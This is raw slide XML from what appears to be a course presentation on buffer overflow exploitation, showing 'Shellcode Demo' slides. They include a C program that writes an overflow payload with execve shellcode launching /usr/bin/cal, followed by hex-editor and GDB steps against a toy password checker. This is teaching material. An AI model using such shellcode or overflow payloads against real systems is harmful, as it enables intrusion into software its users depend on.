        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539552" y="1628800"/>
            <a:ext cx="7645643" cy="3240360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="5229200"/>
            <a:ext cx="2108269" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>See: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Lex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Yacc</a:t>
            </a:r>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7467600" cy="706090"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Demo (7)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1600200"/>
            <a:ext cx="2267744" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Using C program to create the shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="764704"/>
            <a:ext cx="6840760" cy="5693866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   FILE *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>filesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   unsigned char buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[]="\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>                          "\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                          "\xd0\xf1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                          "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                          "\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x31\xc0\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x80\xe8\xe5"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                          "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x63\x61\x6c";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>("exploitsucc.bin", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>     return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(unsigned char), 69, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220072" y="1124744"/>
            <a:ext cx="1503938" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>xpsucc.c</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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(8)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Use the software of bless hex editor to observe the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> file.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3" descr="擷取選取區域_051.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2996952"/>
            <a:ext cx="8225529" cy="2592288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW"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(9)</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GDB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bfsucc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>disass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>IsPasswordValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" smtClean="0"/>
              <a:t>break *0x08048504</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2771800" y="3140968"/>
            <a:ext cx="5486400" cy="3495675"/>
            <a:chOff x="2771800" y="3140968"/>
            <a:chExt cx="5486400" cy="3495675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="圖片 6" descr="擷取選取區域_057.bmp"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2771800" y="3140968"/>
              <a:ext cx="5486400" cy="3495675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="橢圓 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2843808" y="4221088"/>
              <a:ext cx="4752528" cy="504056"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="投影片編號版面配置區 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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(10)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1340768"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>run and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>password: 1234567890123456789012341111</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1547664" y="2564904"/>
            <a:ext cx="6984776" cy="4076700"/>
            <a:chOff x="1547664" y="2564904"/>
            <a:chExt cx="6984776" cy="4076700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="圖片 8" descr="擷取選取區域_058.bmp"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1835696" y="2564904"/>
              <a:ext cx="6562725" cy="4076700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="橢圓 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2771800" y="5445224"/>
              <a:ext cx="1584176" cy="288032"/>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6" name="橢圓 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6804248" y="6093296"/>
              <a:ext cx="1728192"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
          <p:nvSpPr>
            <p:cNvPr id="7" name="橢圓 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1547664" y="6237312"/>
